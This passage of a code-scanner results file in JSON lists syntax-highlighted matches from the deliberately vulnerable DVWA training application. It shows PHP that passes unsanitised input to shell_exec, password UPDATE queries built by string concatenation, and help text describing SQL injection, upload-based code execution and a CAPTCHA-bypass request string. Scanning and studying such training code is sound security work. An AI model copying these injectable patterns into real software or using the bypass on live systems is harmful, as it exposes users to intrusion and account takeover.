"match": "<span class=\"line-number\">18:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Windows\n<span class=\"line-number\">19:</span> \t\t<span class=\"token variable\">$cmd</span> <span class=\"token operator\">=</span> <span class=\"token function\">shell_exec</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'ping '</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$target</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">20:</span> \t}\n<span class=\"line-number\">21:</span> \t<span class=\"token keyword\">else</span> {\n<span class=\"line-number\">22:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> <span class=\"token operator\">*</span>nix\n<span class=\"highlight\"><span class=\"line-number\">23:</span> \t\t<span class=\"token variable\">$cmd</span> <span class=\"token operator\">=</span> <span class=\"token function\">shell_exec</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'ping -c 4 '</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$target</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">24:</span> \t}\n<span class=\"line-number\">25:</span> \n<span class=\"line-number\">26:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Feedback <span class=\"token keyword\">for</span> the end user\n<span class=\"line-number\">27:</span> \t<span class=\"token variable\">$html</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">\"<pre>{$cmd}</pre>\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">28:</span> }",
"line": 23,
"start": 18,
"end": 29,
"severity": "unknown",
"note": ""
},
{
"id": 227,
"file": "/home/chris/src/DVWA-master/vulnerabilities/sqli/help/help.php",
"filetype": "php",
"search": "\\ssystem\\s*\\(",
"match": "<span class=\"line-number\">6:</span> \t<span class=\"token operator\"><</span>tr<span class=\"token operator\">></span>\n<span class=\"line-number\">7:</span> \t<span class=\"token operator\"><</span>td<span class=\"token operator\">></span><span class=\"token operator\"><</span>div id<span class=\"token operator\">=</span><span class=\"token string\">\"code\"</span><span class=\"token operator\">></span>\n<span class=\"line-number\">8:</span> \t\t<span class=\"token operator\"><</span>h3<span class=\"token operator\">></span>About<span class=\"token operator\"><</span><span class=\"token operator\">/</span>h3<span class=\"token operator\">></span>\n<span class=\"line-number\">9:</span> \t\t<span class=\"token operator\"><</span>p<span class=\"token operator\">></span>A SQL injection attack consists of insertion <span class=\"token operator\">or</span> <span class=\"token string\">\"injection\"</span> of a SQL query via the input data from the client <span class=\"token keyword\">to</span> the application<span class=\"token punctuation\">.</span>\n<span class=\"line-number\">10:</span> \t\t\tA successful SQL injection exploit can read sensitive data from the database<span class=\"token punctuation\">,</span> modify database data <span class=\"token punctuation\">(</span>insert<span class=\"token operator\">/</span>update<span class=\"token operator\">/</span>delete<span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> execute administration operations on the database\n<span class=\"highlight\"><span class=\"line-number\">11:</span> \t\t\t<span class=\"token punctuation\">(</span>such as shutdown the DBMS<span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> recover the content of a given file present on the DBMS file system <span class=\"token punctuation\">(</span>load_file<span class=\"token punctuation\">)</span> <span class=\"token operator\">and</span> <span class=\"token keyword\">in</span> some cases issue commands <span class=\"token keyword\">to</span> the operating system<span class=\"token punctuation\">.</span><span class=\"token operator\"><</span><span class=\"token operator\">/</span>p<span class=\"token operator\">></span></span>\n<span class=\"line-number\">12:</span> \n<span class=\"line-number\">13:</span> \t\t<span class=\"token operator\"><</span>p<span class=\"token operator\">></span>SQL injection attacks are a type of injection attack<span class=\"token punctuation\">,</span> <span class=\"token keyword\">in</span> which SQL commands are injected into data<span class=\"token operator\">-</span>plane input <span class=\"token keyword\">in</span> order <span class=\"token keyword\">to</span> effect the execution of predefined SQL commands<span class=\"token punctuation\">.</span><span class=\"token operator\"><</span><span class=\"token operator\">/</span>p<span class=\"token operator\">></span>\n<span class=\"line-number\">14:</span> \n<span class=\"line-number\">15:</span> \t\t<span class=\"token operator\"><</span>p<span class=\"token operator\">></span>This attack may also be called <span class=\"token string\">\"SQLi\"</span><span class=\"token punctuation\">.</span><span class=\"token operator\"><</span><span class=\"token operator\">/</span>p<span class=\"token operator\">></span>\n<span class=\"line-number\">16:</span> ",
"line": 11,
"start": 6,
"end": 17,
"severity": "unknown",
"note": ""
},
{
"id": 249,
"file": "/home/chris/src/DVWA-master/vulnerabilities/upload/help/help.php",
"filetype": "php",
"search": "\\ssystem\\s*\\(",
"match": "<span class=\"line-number\">13:</span> \t\t\t<span class=\"token operator\">and</span> simple defacement<span class=\"token punctuation\">.</span> It depends on what the application does <span class=\"token keyword\">with</span> the uploaded file<span class=\"token punctuation\">,</span> including where it is stored<span class=\"token punctuation\">.</span><span class=\"token operator\"><</span><span class=\"token operator\">/</span>p<span class=\"token operator\">></span>\n<span class=\"line-number\">14:</span> \n<span class=\"line-number\">15:</span> \t\t<span class=\"token operator\"><</span>br <span class=\"token operator\">/</span><span class=\"token operator\">></span><span class=\"token operator\"><</span>hr <span class=\"token operator\">/</span><span class=\"token operator\">></span><span class=\"token operator\"><</span>br <span class=\"token operator\">/</span><span class=\"token operator\">></span>\n<span class=\"line-number\">16:</span> \n<span class=\"line-number\">17:</span> \t\t<span class=\"token operator\"><</span>h3<span class=\"token operator\">></span>Objective<span class=\"token operator\"><</span><span class=\"token operator\">/</span>h3<span class=\"token operator\">></span>\n<span class=\"highlight\"><span class=\"line-number\">18:</span> \t\t<span class=\"token operator\"><</span>p<span class=\"token operator\">></span>Execute any PHP function of your choosing on the target system <span class=\"token punctuation\">(</span>such as <span class=\"token operator\"><</span><span class=\"token operator\">?</span>php echo <span class=\"token function\">dvwaExternalLinkUrlGet</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'https://secure.php.net/manual/en/function.phpinfo.php'</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'phpinfo()'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">; ?></span></span>\n<span class=\"line-number\">19:</span> \t\t\t<span class=\"token operator\">or</span> <span class=\"token operator\"><</span><span class=\"token operator\">?</span>php echo <span class=\"token function\">dvwaExternalLinkUrlGet</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'https://secure.php.net/manual/en/function.system.php'</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'system()'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">; ?>) thanks to this file upload vulnerability.</p></span>\n<span class=\"line-number\">20:</span> \n<span class=\"line-number\">21:</span> \t\t<span class=\"token operator\"><</span>br <span class=\"token operator\">/</span><span class=\"token operator\">></span><span class=\"token operator\"><</span>hr <span class=\"token operator\">/</span><span class=\"token operator\">></span><span class=\"token operator\"><</span>br <span class=\"token operator\">/</span><span class=\"token operator\">></span>\n<span class=\"line-number\">22:</span> \n<span class=\"line-number\">23:</span> \t\t<span class=\"token operator\"><</span>h3<span class=\"token operator\">></span>Low Level<span class=\"token operator\"><</span><span class=\"token operator\">/</span>h3<span class=\"token operator\">></span>",
"line": 18,
"start": 13,
"end": 24,
"severity": "unknown",
"note": ""
},
{
"id": 76,
"file": "/home/chris/src/DVWA-master/vulnerabilities/brute/source/impossible.php",
"filetype": "php",
"search": "\\supdate",
"match": "<span class=\"line-number\">76:</span> \t\t<span class=\"token function\">sleep</span><span class=\"token punctuation\">(</span> <span class=\"token function\">rand</span><span class=\"token punctuation\">(</span> <span class=\"token number\">2</span><span class=\"token punctuation\">,</span> <span class=\"token number\">4</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">77:</span> \n<span class=\"line-number\">78:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Give the user some feedback\n<span class=\"line-number\">79:</span> \t\t<span class=\"token variable\">$html</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">\"<pre><br />Username and/or password incorrect.<br /><br/>Alternative, the account has been locked because of too many failed logins.<br />If this is the case, <em>please try again in {$lockout_time} minutes</em>.</pre>\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">80:</span> \n<span class=\"highlight\"><span class=\"line-number\">81:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Update bad login count</span>\n<span class=\"line-number\">82:</span> \t\t<span class=\"token variable\">$data</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$db</span><span class=\"token operator\">-</span><span class=\"token operator\">></span><span class=\"token function\">prepare</span><span class=\"token punctuation\">(</span> 'UPDATE users SET failed_login <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span>failed_login <span class=\"token operator\">+</span> <span class=\"token number\">1</span><span class=\"token punctuation\">)</span> WHERE user <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">:</span>user<span class=\"token punctuation\">)</span> LIMIT <span class=\"token number\">1</span><span class=\"token comment\" spellcheck=\"true\">;' );</span>\n<span class=\"line-number\">83:</span> \t\t<span class=\"token variable\">$data</span><span class=\"token operator\">-</span><span class=\"token operator\">></span><span class=\"token function\">bindParam</span><span class=\"token punctuation\">(</span> <span class=\"token string\">':user'</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$user</span><span class=\"token punctuation\">,</span> PDO<span class=\"token punctuation\">:</span><span class=\"token punctuation\">:</span>PARAM_STR <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">84:</span> \t\t<span class=\"token variable\">$data</span><span class=\"token operator\">-</span><span class=\"token operator\">></span><span class=\"token function\">execute</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">85:</span> \t}\n<span class=\"line-number\">86:</span> ",
"line": 81,
"start": 76,
"end": 87,
"severity": "unknown",
"note": ""
},
{
"id": 89,
"file": "/home/chris/src/DVWA-master/vulnerabilities/captcha/help/help.php",
"filetype": "php",
"search": "\\supdate",
"match": "<span class=\"line-number\">22:</span> \n<span class=\"line-number\">23:</span> \t\t<span class=\"token operator\"><</span>br <span class=\"token operator\">/</span><span class=\"token operator\">></span><span class=\"token operator\"><</span>hr <span class=\"token operator\">/</span><span class=\"token operator\">></span><span class=\"token operator\"><</span>br <span class=\"token operator\">/</span><span class=\"token operator\">></span>\n<span class=\"line-number\">24:</span> \n<span class=\"line-number\">25:</span> \t\t<span class=\"token operator\"><</span>h3<span class=\"token operator\">></span>Low Level<span class=\"token operator\"><</span><span class=\"token operator\">/</span>h3<span class=\"token operator\">></span>\n<span class=\"line-number\">26:</span> \t\t<span class=\"token operator\"><</span>p<span class=\"token operator\">></span>The issue <span class=\"token keyword\">with</span> this CAPTCHA is that it is easily bypassed<span class=\"token punctuation\">.</span> The developer has made the assumption that all users will progress through screen <span class=\"token number\">1</span><span class=\"token punctuation\">,</span> complete the CAPTCHA<span class=\"token punctuation\">,</span> <span class=\"token operator\">and</span> <span class=\"token keyword\">then</span>\n<span class=\"highlight\"><span class=\"line-number\">27:</span> \t\t\tmove on <span class=\"token keyword\">to</span> the <span class=\"token keyword\">next</span> screen where the password is actually updated<span class=\"token punctuation\">.</span> By submitting the new password directly <span class=\"token keyword\">to</span> the change page<span class=\"token punctuation\">,</span> the user may bypass the CAPTCHA system<span class=\"token punctuation\">.</span><span class=\"token operator\"><</span><span class=\"token operator\">/</span>p<span class=\"token operator\">></span></span>\n<span class=\"line-number\">28:</span> \n<span class=\"line-number\">29:</span> \t\t<span class=\"token operator\"><</span>p<span class=\"token operator\">></span>The parameters required <span class=\"token keyword\">to</span> complete this challenge <span class=\"token keyword\">in</span> low security would be similar <span class=\"token keyword\">to</span> the following<span class=\"token punctuation\">:</span><span class=\"token operator\"><</span><span class=\"token operator\">/</span>p<span class=\"token operator\">></span>\n<span class=\"line-number\">30:</span> \t\t<span class=\"token operator\"><</span>pre<span class=\"token operator\">></span>Spoiler<span class=\"token punctuation\">:</span> <span class=\"token operator\"><</span>span class<span class=\"token operator\">=</span><span class=\"token string\">\"spoiler\"</span><span class=\"token operator\">></span><span class=\"token operator\">?</span><span class=\"token keyword\">step</span><span class=\"token operator\">=</span><span class=\"token number\">2</span><span class=\"token operator\">&</span>password_new<span class=\"token operator\">=</span>password<span class=\"token operator\">&</span>password_conf<span class=\"token operator\">=</span>password<span class=\"token operator\">&</span>Change<span class=\"token operator\">=</span>Change<span class=\"token operator\"><</span><span class=\"token operator\">/</span>span<span class=\"token operator\">></span><span class=\"token punctuation\">.</span><span class=\"token operator\"><</span><span class=\"token operator\">/</span>pre<span class=\"token operator\">></span>\n<span class=\"line-number\">31:</span> \n<span class=\"line-number\">32:</span> \t\t<span class=\"token operator\"><</span>br <span class=\"token operator\">/</span><span class=\"token operator\">></span>",
"line": 27,
"start": 22,
"end": 33,
"severity": "unknown",
"note": ""
},
{
"id": 101,
"file": "/home/chris/src/DVWA-master/vulnerabilities/captcha/source/high.php",
"filetype": "php",
"search": "\\supdate",
"match": "<span class=\"line-number\">25:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> CAPTCHA was correct<span class=\"token punctuation\">.</span> <span class=\"token keyword\">Do</span> both new passwords match<span class=\"token operator\">?</span>\n<span class=\"line-number\">26:</span> \t\t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_new</span> <span class=\"token operator\">==</span> <span class=\"token variable\">$pass_conf</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">27:</span> \t\t\t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$pass_new</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">28:</span> \t\t\t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_new</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">29:</span> \n<span class=\"highlight\"><span class=\"line-number\">30:</span> \t\t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Update database</span>\n<span class=\"line-number\">31:</span> \t\t\t<span class=\"token variable\">$insert</span> <span class=\"token operator\">=</span> <span class=\"token string\">\"UPDATE `users` SET password = '$pass_new' WHERE user = '\"</span> <span class=\"token punctuation\">.</span> <span class=\"token function\">dvwaCurrentUser</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> \"' LIMIT <span class=\"token number\">1</span><span class=\"token comment\" spellcheck=\"true\">;\";</span>\n<span class=\"line-number\">32:</span> \t\t\t<span class=\"token variable\">$result</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_query</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$insert</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">or</span> <span class=\"token function\">die</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'<pre>'</span> <span class=\"token punctuation\">.</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_error</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$___mysqli_res</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_connect_error</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token variable\">$___mysqli_res</span> <span class=\"token punctuation\">:</span> <span class=\"token boolean\">false</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">'</pre>'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">33:</span> \n<span class=\"line-number\">34:</span> \t\t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Feedback <span class=\"token keyword\">for</span> user\n<span class=\"line-number\">35:</span> \t\t\t<span class=\"token variable\">$html</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">\"<pre>Password Changed.</pre>\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
"line": 30,
"start": 25,
"end": 36,
"severity": "unknown",
"note": ""
},
{
"id": 114,
"file": "/home/chris/src/DVWA-master/vulnerabilities/captcha/source/impossible.php",
"filetype": "php",
"search": "\\supdate",
"match": "<span class=\"line-number\">43:</span> \t\t<span class=\"token variable\">$data</span><span class=\"token operator\">-</span><span class=\"token operator\">></span><span class=\"token function\">bindParam</span><span class=\"token punctuation\">(</span> <span class=\"token string\">':password'</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$pass_curr</span><span class=\"token punctuation\">,</span> PDO<span class=\"token punctuation\">:</span><span class=\"token punctuation\">:</span>PARAM_STR <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">44:</span> \t\t<span class=\"token variable\">$data</span><span class=\"token operator\">-</span><span class=\"token operator\">></span><span class=\"token function\">execute</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">45:</span> \n<span class=\"line-number\">46:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> <span class=\"token keyword\">Do</span> both new password match <span class=\"token operator\">and</span> was the current password correct<span class=\"token operator\">?</span>\n<span class=\"line-number\">47:</span> \t\t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_new</span> <span class=\"token operator\">==</span> <span class=\"token variable\">$pass_conf</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token punctuation\">(</span> <span class=\"token variable\">$data</span><span class=\"token operator\">-</span><span class=\"token operator\">></span><span class=\"token function\">rowCount</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">==</span> <span class=\"token number\">1</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"highlight\"><span class=\"line-number\">48:</span> \t\t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Update the database</span>\n<span class=\"line-number\">49:</span> \t\t\t<span class=\"token variable\">$data</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$db</span><span class=\"token operator\">-</span><span class=\"token operator\">></span><span class=\"token function\">prepare</span><span class=\"token punctuation\">(</span> 'UPDATE users SET password <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">:</span>password<span class=\"token punctuation\">)</span> WHERE user <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">:</span>user<span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;' );</span>\n<span class=\"line-number\">50:</span> \t\t\t<span class=\"token variable\">$data</span><span class=\"token operator\">-</span><span class=\"token operator\">></span><span class=\"token function\">bindParam</span><span class=\"token punctuation\">(</span> <span class=\"token string\">':password'</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$pass_new</span><span class=\"token punctuation\">,</span> PDO<span class=\"token punctuation\">:</span><span class=\"token punctuation\">:</span>PARAM_STR <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">51:</span> \t\t\t<span class=\"token variable\">$data</span><span class=\"token operator\">-</span><span class=\"token operator\">></span><span class=\"token function\">bindParam</span><span class=\"token punctuation\">(</span> <span class=\"token string\">':user'</span><span class=\"token punctuation\">,</span> <span class=\"token function\">dvwaCurrentUser</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> PDO<span class=\"token punctuation\">:</span><span class=\"token punctuation\">:</span>PARAM_STR <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">52:</span> \t\t\t<span class=\"token variable\">$data</span><span class=\"token operator\">-</span><span class=\"token operator\">></span><span class=\"token function\">execute</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">53:</span> ",
"line": 48,
"start": 43,
"end": 54,
"severity": "unknown",
"note": ""
},
{
"id": 126,
"file": "/home/chris/src/DVWA-master/vulnerabilities/captcha/source/low.php",
"filetype": "php",
"search": "\\supdate",
"match": "<span class=\"line-number\">54:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_new</span> <span class=\"token operator\">==</span> <span class=\"token variable\">$pass_conf</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">55:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> They <span class=\"token keyword\">do</span>!\n<span class=\"line-number\">56:</span> \t\t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$pass_new</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">57:</span> \t\t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_new</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">58:</span> \n<span class=\"highlight\"><span class=\"line-number\">59:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Update database</span>\n<span class=\"line-number\">60:</span> \t\t<span class=\"token variable\">$insert</span> <span class=\"token operator\">=</span> <span class=\"token string\">\"UPDATE `users` SET password = '$pass_new' WHERE user = '\"</span> <span class=\"token punctuation\">.</span> <span class=\"token function\">dvwaCurrentUser</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> \"'<span class=\"token comment\" spellcheck=\"true\">;\";</span>\n<span class=\"line-number\">61:</span> \t\t<span class=\"token variable\">$result</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_query</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$insert</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">or</span> <span class=\"token function\">die</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'<pre>'</span> <span class=\"token punctuation\">.</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_error</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$___mysqli_res</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_connect_error</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token variable\">$___mysqli_res</span> <span class=\"token punctuation\">:</span> <span class=\"token boolean\">false</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">'</pre>'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">62:</span> \n<span class=\"line-number\">63:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Feedback <span class=\"token keyword\">for</span> the end user\n<span class=\"line-number\">64:</span> \t\t<span class=\"token variable\">$html</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">\"<pre>Password Changed.</pre>\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
"line": 59,
"start": 54,
"end": 65,
"severity": "unknown",
"note": ""
},
{
"id": 138,
"file": "/home/chris/src/DVWA-master/vulnerabilities/captcha/source/medium.php",
"filetype": "php",
"search": "\\supdate",
"match": "<span class=\"line-number\">62:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_new</span> <span class=\"token operator\">==</span> <span class=\"token variable\">$pass_conf</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">63:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> They <span class=\"token keyword\">do</span>!\n<span class=\"line-number\">64:</span> \t\t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span 